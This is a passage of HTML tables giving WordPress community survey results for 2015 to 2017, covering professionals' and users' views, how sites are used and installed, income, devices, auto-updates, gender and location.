Option</td>\n<td>1,739</td>\n<td>4%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>I&#8217;ve contributed a WordPress core patch.</td>\n<td>1,055</td>\n<td>2%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n</tbody>\n</table>\n<h3>What&#8217;s the best thing about WordPress?<a href=\"#text\">*</a></h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Professional</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>22,718</td>\n<td></td>\n<td>7,891</td>\n<td></td>\n<td>8,267</td>\n<td></td>\n</tr>\n<tr>\n<td>Easy/simple/user-friendly</td>\n<td>9,450</td>\n<td>42%</td>\n<td>3,454</td>\n<td>44%</td>\n<td>3,852</td>\n<td>47%</td>\n</tr>\n<tr>\n<td>Customizable/extensible/modular/plugins/themes</td>\n<td>8,601</td>\n<td>38%</td>\n<td>3,116</td>\n<td>39%</td>\n<td>3,555</td>\n<td>43%</td>\n</tr>\n<tr>\n<td>Community/support/documentation/help</td>\n<td>3,806</td>\n<td>17%</td>\n<td>1,211</td>\n<td>15%</td>\n<td>1,340</td>\n<td>16%</td>\n</tr>\n<tr>\n<td>Free/open/open source</td>\n<td>2,291</td>\n<td>10%</td>\n<td>802</td>\n<td>10%</td>\n<td>908</td>\n<td>11%</td>\n</tr>\n<tr>\n<td>Popular/ubiquitous</td>\n<td>249</td>\n<td>1%</td>\n<td>86</td>\n<td>1%</td>\n<td>187</td>\n<td>2%</td>\n</tr>\n</tbody>\n</table>\n<h3> What&#8217;s the most frustrating thing about WordPress?<a href=\"#text\">*</a></h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Professional</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>21,144</td>\n<td></td>\n<td>7,294</td>\n<td></td>\n<td>7,691</td>\n<td></td>\n</tr>\n<tr>\n<td>Plugins &amp; themes (abandoned/conflicts/coding standards)</td>\n<td>6,122</td>\n<td>29%</td>\n<td>2,194</td>\n<td>30%</td>\n<td>2,187</td>\n<td>28%</td>\n</tr>\n<tr>\n<td>Security/vulnerabilities/hacks</td>\n<td>2,321</td>\n<td>11%</td>\n<td>712</td>\n<td>10%</td>\n<td>829</td>\n<td>11%</td>\n</tr>\n<tr>\n<td>Updates</td>\n<td>1,544</td>\n<td>7%</td>\n<td>422</td>\n<td>6%</td>\n<td>508</td>\n<td>7%</td>\n</tr>\n<tr>\n<td>Nothing/I don&#8217;t know/can&#8217;t think of anything</td>\n<td>1,276</td>\n<td>6%</td>\n<td>344</td>\n<td>5%</td>\n<td>476</td>\n<td>6%</td>\n</tr>\n<tr>\n<td>Speed/performance/slow/heavy</td>\n<td>1,196</td>\n<td>6%</td>\n<td>644</td>\n<td>9%</td>\n<td>516</td>\n<td>7%</td>\n</tr>\n</tbody>\n</table>\n<h3>WordPress is as good as, or better than, its main competitors.</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress Professional</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses (this question was not asked in the 2015 survey)</td>\n<td></td>\n<td></td>\n<td>8,672</td>\n<td></td>\n<td>9,059</td>\n<td></td>\n</tr>\n<tr>\n<td>Agree</td>\n<td></td>\n<td></td>\n<td>7551</td>\n<td>87%</td>\n<td>7836</td>\n<td>87%</td>\n</tr>\n<tr>\n<td>Prefer not to answer</td>\n<td></td>\n<td></td>\n<td>754</td>\n<td>9%</td>\n<td>795</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>Disagree</td>\n<td></td>\n<td></td>\n<td>370</td>\n<td>4%</td>\n<td>428</td>\n<td>5%</td>\n</tr>\n</tbody>\n</table>\n<h2 id=\"user\">WordPress Users</h2>\n<h3>Which of the following describes how you use WordPress?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress User</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>15,169</td>\n<td></td>\n<td>5,043</td>\n<td></td>\n<td>5,521</td>\n<td></td>\n</tr>\n<tr>\n<td>My personal blog (or blogs) uses WordPress.</td>\n<td>9,395</td>\n<td>36%</td>\n<td>3,117</td>\n<td>36%</td>\n<td>3,424</td>\n<td>36%</td>\n</tr>\n<tr>\n<td>My company or organization&#8217;s website is built with WordPress software.</td>\n<td>7,480</td>\n<td>29%</td>\n<td>2,519</td>\n<td>29%</td>\n<td>2,841</td>\n<td>30%</td>\n</tr>\n<tr>\n<td>I have a hobby or side project that has a website built with WordPress.</td>\n<td>6,112</td>\n<td>23%</td>\n<td>1,973</td>\n<td>23%</td>\n<td>2,200</td>\n<td>23%</td>\n</tr>\n<tr>\n<td>I write (or otherwise work) for an online publication that uses WordPress.</td>\n<td>2,329</td>\n<td>9%</td>\n<td>806</td>\n<td>9%</td>\n<td>821</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>Other Option</td>\n<td>872</td>\n<td>3%</td>\n<td>234</td>\n<td>3%</td>\n<td>288</td>\n<td>3%</td>\n</tr>\n</tbody>\n</table>\n<h3>Who installed your WordPress website?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress User</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>15,055</td>\n<td></td>\n<td>5,020</td>\n<td></td>\n<td>5,523</td>\n<td></td>\n</tr>\n<tr>\n<td>I did.</td>\n<td>11,216</td>\n<td>66%</td>\n<td>3,659</td>\n<td>73%</td>\n<td>4,129</td>\n<td>75%</td>\n</tr>\n<tr>\n<td>My hosting provider</td>\n<td>2,236</td>\n<td>13%</td>\n<td>667</td>\n<td>13%</td>\n<td>767</td>\n<td>14%</td>\n</tr>\n<tr>\n<td>An external company</td>\n<td>909</td>\n<td>5%</td>\n<td>182</td>\n<td>4%</td>\n<td>178</td>\n<td>3%</td>\n</tr>\n<tr>\n<td>An internal web person/team or a colleague</td>\n<td>874</td>\n<td>5%</td>\n<td>178</td>\n<td>4%</td>\n<td>191</td>\n<td>3%</td>\n</tr>\n<tr>\n<td>A friend or family member</td>\n<td>787</td>\n<td>5%</td>\n<td>192</td>\n<td>4%</td>\n<td>172</td>\n<td>3%</td>\n</tr>\n<tr>\n<td>I don&#8217;t know</td>\n<td>502</td>\n<td>3%</td>\n<td>145</td>\n<td>3%</td>\n<td>87</td>\n<td>2%</td>\n</tr>\n<tr>\n<td>Other Option</td>\n<td>345</td>\n<td>2%</td>\n<td>n/a</td>\n<td>n/a</td>\n<td>n/a</td>\n<td>n/a</td>\n</tr>\n</tbody>\n</table>\n<h3>How much has the site been customized from the original WordPress installation?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress User</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>14,789</td>\n<td></td>\n<td>4,997</td>\n<td></td>\n<td>5,494</td>\n<td></td>\n</tr>\n<tr>\n<td>There&#8217;s a different theme and some plugins have been added.</td>\n<td>7,465</td>\n<td>50%</td>\n<td>2,337</td>\n<td>47%</td>\n<td>2,660</td>\n<td>48%</td>\n</tr>\n<tr>\n<td>A lot of work has been done, the site itself is unrecognizable from the original theme, but the Dashboard still looks like the usual WordPress interface.</td>\n<td>4,715</td>\n<td>32%</td>\n<td>1,707</td>\n<td>34%</td>\n<td>1,872</td>\n<td>34%</td>\n</tr>\n<tr>\n<td>Not at all, it&#8217;s still pretty much the same as it was when I started out.</td>\n<td>1,841</td>\n<td>12%</td>\n<td>635</td>\n<td>13%</td>\n<td>673</td>\n<td>12%</td>\n</tr>\n<tr>\n<td>You&#8217;d never know this was a WordPress installation, everything has been customized.</td>\n<td>768</td>\n<td>5%</td>\n<td>321</td>\n<td>6%</td>\n<td>290</td>\n<td>5%</td>\n</tr>\n</tbody>\n</table>\n<h3>What&#8217;s the best thing about WordPress?<a href=\"#text\">*</a></h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress User</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>14,328</td>\n<td></td>\n<td>4,613</td>\n<td></td>\n<td>5,076</td>\n<td></td>\n</tr>\n<tr>\n<td>Easy/simple/user-friendly</td>\n<td>7,391</td>\n<td>52%</td>\n<td>2,276</td>\n<td>49%</td>\n<td>2,511</td>\n<td>49%</td>\n</tr>\n<tr>\n<td>Customizable/extensible/modular/plugins/themes</td>\n<td>4,219</td>\n<td>29%</td>\n<td>1,569</td>\n<td>34%</td>\n<td>1,632</td>\n<td>32%</td>\n</tr>\n<tr>\n<td>Free/open/open source</td>\n<td>1,586</td>\n<td>11%</td>\n<td>493</td>\n<td>11%</td>\n<td>538</td>\n<td>11%</td>\n</tr>\n<tr>\n<td>Community/support/documentation/help</td>\n<td>1,085</td>\n<td>8%</td>\n<td>388</td>\n<td>8%</td>\n<td>458</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>Popular/ubiquitous</td>\n<td>223</td>\n<td>2%</td>\n<td>74</td>\n<td>2%</td>\n<td>48</td>\n<td>1%</td>\n</tr>\n</tbody>\n</table>\n<h3>What&#8217;s the most frustrating thing about WordPress?<a href=\"#text\">*</a></h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress User</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td>13,681</td>\n<td></td>\n<td>4,287</td>\n<td></td>\n<td>4,758</td>\n<td></td>\n</tr>\n<tr>\n<td>Plugins &amp; themes (abandoned/conflicts/coding standards)</td>\n<td>2,531</td>\n<td>19%</td>\n<td>1,183</td>\n<td>28%</td>\n<td>1,300</td>\n<td>27%</td>\n</tr>\n<tr>\n<td>Customization/design/look/template</td>\n<td>1,273</td>\n<td>9%</td>\n<td>381</td>\n<td>9%</td>\n<td>408</td>\n<td>9%</td>\n</tr>\n<tr>\n<td>Code/coding/PHP</td>\n<td>931</td>\n<td>7%</td>\n<td>306</td>\n<td>7%</td>\n<td>277</td>\n<td>6%</td>\n</tr>\n<tr>\n<td>Updates</td>\n<td>926</td>\n<td>7%</td>\n<td>209</td>\n<td>5%</td>\n<td>296</td>\n<td>6%</td>\n</tr>\n<tr>\n<td>Security/vulnerabilites/hacks</td>\n<td>785</td>\n<td>6%</td>\n<td>255</td>\n<td>6%</td>\n<td>292</td>\n<td>6%</td>\n</tr>\n</tbody>\n</table>\n<h3>WordPress is as good as, or better than, its main competitors.</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"51\" />\n<col width=\"47\" />\n<col width=\"51\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: WordPress User</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td></td>\n<td></td>\n<td>5,026</td>\n<td></td>\n<td>5,498</td>\n<td></td>\n</tr>\n<tr>\n<td>Agree</td>\n<td></td>\n<td></td>\n<td>4,038</td>\n<td>80%</td>\n<td>4,462</td>\n<td>81%</td>\n</tr>\n<tr>\n<td>Prefer not to answer</td>\n<td></td>\n<td></td>\n<td>737</td>\n<td>15%</td>\n<td>782</td>\n<td>14%</td>\n</tr>\n<tr>\n<td>Disagree</td>\n<td></td>\n<td></td>\n<td>254</td>\n<td>5%</td>\n<td>255</td>\n<td>5%</td>\n</tr>\n</tbody>\n</table>\n<h2 id=\"all\">All Respondents</h2>\n<h3>Can you (truthfully!) say &#8220;I make my living from WordPress&#8221;?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: All Respondents</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses (combination of all three groups from 2015; this question was not broken out by group in 2016-2017)</td>\n<td>42,236</td>\n<td></td>\n<td>14,906</td>\n<td></td>\n<td>15,616</td>\n<td></td>\n</tr>\n<tr>\n<td>Not really, but I do get some or all of my income as a result of working with WordPress.</td>\n<td>16,607</td>\n<td>39%</td>\n<td>5,408</td>\n<td>36%</td>\n<td>5,702</td>\n<td>37%</td>\n</tr>\n<tr>\n<td>Yes.</td>\n<td>9,635</td>\n<td>23%</td>\n<td>4,791</td>\n<td>32%</td>\n<td>5,033</td>\n<td>32%</td>\n</tr>\n<tr>\n<td>No.</td>\n<td>15,995</td>\n<td>38%</td>\n<td>4,713</td>\n<td>32%</td>\n<td>4,882</td>\n<td>31%</td>\n</tr>\n</tbody>\n</table>\n<h3>Which devices do you access WordPress on?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: All Respondents</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses (combination of all three groups from 2015; this question was not broken out by group in 2016-2017)</td>\n<td>42,433</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Web</td>\n<td>40,503</td>\n<td>95%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Android phone</td>\n<td>15,396</td>\n<td>36%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>iPhone</td>\n<td>12,353</td>\n<td>29%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>iPad</td>\n<td>11,748</td>\n<td>28%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Android tablet</td>\n<td>9,223</td>\n<td>22%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Desktop app, like MarsEdit</td>\n<td>6,018</td>\n<td>14%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Other Option</td>\n<td>1837</td>\n<td>4%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses (this question was not broken out by group in 2016-2017)</td>\n<td></td>\n<td></td>\n<td>14,840</td>\n<td></td>\n<td>15,597</td>\n<td></td>\n</tr>\n<tr>\n<td>Web browser on a desktop or laptop</td>\n<td></td>\n<td></td>\n<td>14,160</td>\n<td>54%</td>\n<td>15,052</td>\n<td>55%</td>\n</tr>\n<tr>\n<td>Web browser on a mobile device (tablet or phone)</td>\n<td></td>\n<td></td>\n<td>7,952</td>\n<td>30%</td>\n<td>8,248</td>\n<td>30%</td>\n</tr>\n<tr>\n<td>An app on a mobile device (table or phone)</td>\n<td></td>\n<td></td>\n<td>3,309</td>\n<td>13%</td>\n<td>3,311</td>\n<td>12%</td>\n</tr>\n<tr>\n<td>A desktop app like MarsEdit</td>\n<td></td>\n<td></td>\n<td>517</td>\n<td>2%</td>\n<td>498</td>\n<td>2%</td>\n</tr>\n<tr>\n<td>Other Option</td>\n<td></td>\n<td></td>\n<td>282</td>\n<td>1%</td>\n<td>240</td>\n<td>1%</td>\n</tr>\n</tbody>\n</table>\n<h3>WordPress now updates minor &amp; security releases automatically for you. Check all that apply: (question not asked in 2016, 2017)</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"36\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: All Respondents</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses (combination of all three groups)</td>\n<td>39,726</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>I love auto-updates.</td>\n<td>17,367</td>\n<td>44%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>I&#8217;d like to see auto-updates for plugins.</td>\n<td>12,796</td>\n<td>32%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Initially, I was nervous about auto updates.</td>\n<td>11,868</td>\n<td>30%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Auto updates still make me nervous.</td>\n<td>10,809</td>\n<td>27%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Auto updates don&#8217;t make me nervous now.</td>\n<td>10,708</td>\n<td>27%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>I&#8217;d like to see auto-updates for themes.</td>\n<td>10,449</td>\n<td>26%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>I&#8217;d like to see auto updates for major versions of WordPress.</td>\n<td>10,225</td>\n<td>26%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>This is the first I&#8217;ve heard of auto-updates.</td>\n<td>8,660</td>\n<td>22%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>I hate auto-updates.</td>\n<td>3,293</td>\n<td>8%</td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n</tbody>\n</table>\n<h3>What is your gender?<a href=\"#text\">*</a></h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"51\" />\n<col width=\"47\" />\n<col width=\"51\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: All respondents (This question was not asked in the 2015 survey.)</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td></td>\n<td></td>\n<td>13,953</td>\n<td></td>\n<td>14,680</td>\n<td></td>\n</tr>\n<tr>\n<td>Male</td>\n<td></td>\n<td></td>\n<td>10,978</td>\n<td>78.68%</td>\n<td>11,570</td>\n<td>78.81%</td>\n</tr>\n<tr>\n<td>Female</td>\n<td></td>\n<td></td>\n<td>2,340</td>\n<td>16.77%</td>\n<td>2,511</td>\n<td>21.70%</td>\n</tr>\n<tr>\n<td>Prefer not to answer</td>\n<td></td>\n<td></td>\n<td>601</td>\n<td>4.31%</td>\n<td>562</td>\n<td>3.83%</td>\n</tr>\n<tr>\n<td>Transgender</td>\n<td></td>\n<td></td>\n<td>11</td>\n<td>0.08%</td>\n<td>8</td>\n<td>0.05%</td>\n</tr>\n<tr>\n<td>Nonbinary</td>\n<td></td>\n<td></td>\n<td>8</td>\n<td>0.06%</td>\n<td>17</td>\n<td>0.12%</td>\n</tr>\n<tr>\n<td>Genderqueer</td>\n<td></td>\n<td></td>\n<td>4</td>\n<td>0.03%</td>\n<td>3</td>\n<td>0.02%</td>\n</tr>\n<tr>\n<td>Androgynous</td>\n<td></td>\n<td></td>\n<td>6</td>\n<td>0.04%</td>\n<td>5</td>\n<td>0.03%</td>\n</tr>\n<tr>\n<td>Fluid</td>\n<td></td>\n<td></td>\n<td>3</td>\n<td>0.02%</td>\n<td>4</td>\n<td>0.03%</td>\n</tr>\n<tr>\n<td>Demimale</td>\n<td></td>\n<td></td>\n<td>2</td>\n<td>0.01%</td>\n<td>0</td>\n<td>0</td>\n</tr>\n</tbody>\n</table>\n<h3>Where are you located?</h3>\n<table dir=\"ltr\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<colgroup>\n<col width=\"554\" />\n<col width=\"47\" />\n<col width=\"36\" />\n<col width=\"47\" />\n<col width=\"51\" />\n<col width=\"47\" />\n<col width=\"51\" /></colgroup>\n<tbody>\n<tr>\n<td></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2015</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2016</strong></td>\n<td style=\"text-align: center\" colspan=\"2\" rowspan=\"1\"><strong>2017</strong></td>\n</tr>\n<tr>\n<td><em>Group: All respondents (This question was not asked in the 2015 survey.)</em></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td>Number of responses</td>\n<td></td>\n<td></td>\n<td>14,562</td>\n<td></td>\n<td>15,343</td>\n<td></td>\n</tr>\n<tr>\n<td>United States</td>\n<td></td>\n<td></td>\n<td>3,770</td>\n<td>25.89%</td>\n<td>4,067</td>\n<td>26.51%</td>\n</tr>\n<tr>\n<td>India</td>\n<td></td>\n<td></td>\n<td>1,456</td>\n<td>10.00%</td>\n<td>1,424</td>\n<td>9.28%</td>\n</tr>\n<tr>\n<td>United Kingdom</td>\n<td></td>\n<td></td>\n<td>810</td>\n<td>5.56%</td>\n<td>900</td>\n<td>5.87%</td>\n</tr>\n<tr>\n<td>Germany</td>\n<td></td>\n<td></td>\n<td>555</td>\n<td>3.81%</td>\n<td>729</td>\n<td>4.75%</td>\n</tr>\n<tr>\n<td>Canada</td>\n<td></td>\n<td></td>\n<td>511</td>\n<td>3.51%</td>\n<td>599</td>\n<td>3.90%</td>\n</tr>\n<tr>\n<td>Australia</td>\n<td></td>\n<td></td>\n<td>389</td>\n<td>2.67%</td>\n<td>460</td>\n<td>3.00%</td>\n</tr>\n<tr>\n<td>Italy</td>\n<td></td>\n<td></td>\n<td>298</td>\n<td>2.05%</td>\n<td>356</td>\n<td>2.32%</td>\n</tr>\n<tr>\n<td>Netherlands</td>\n<td></td>\n<td></td>\n<td>343</td>\n<td>2.36%</td>\n<td>350</td>\n<td>2.28%</td>\n</tr>\n<tr>\n<td>France</td>\n<td></td>\n<td></td>\n<td>232</td>\n<td>1.59%</td>\n<td>283</td>\n<td>1.84%</td>\n</tr>\n<tr>\n<td>Bangladesh</td>\n<td></td>\n<td></td>\n<td>257</td>\n<td>1.76%</td>\n<td>263</td>\n<td>1.71%</td>\n</tr>\n<tr>\n<td>Spain</td>\n<td></td>\n<td></td>\n<td>271</td>\n<td>1.86%</td>\n<td>252</td>\n<td>1.64%</td>\n</tr>\n<tr>\n<td>Brazil</td>\n<td></td>\n<td></td>\n<td>239</td>\n<td>1.64%</td>\n<td>251</td>\n<td>1.64%</td>\n</tr>\n<tr>\n<td>Pakistan</td>\n<td></td>\n<td></td>\n<td>254</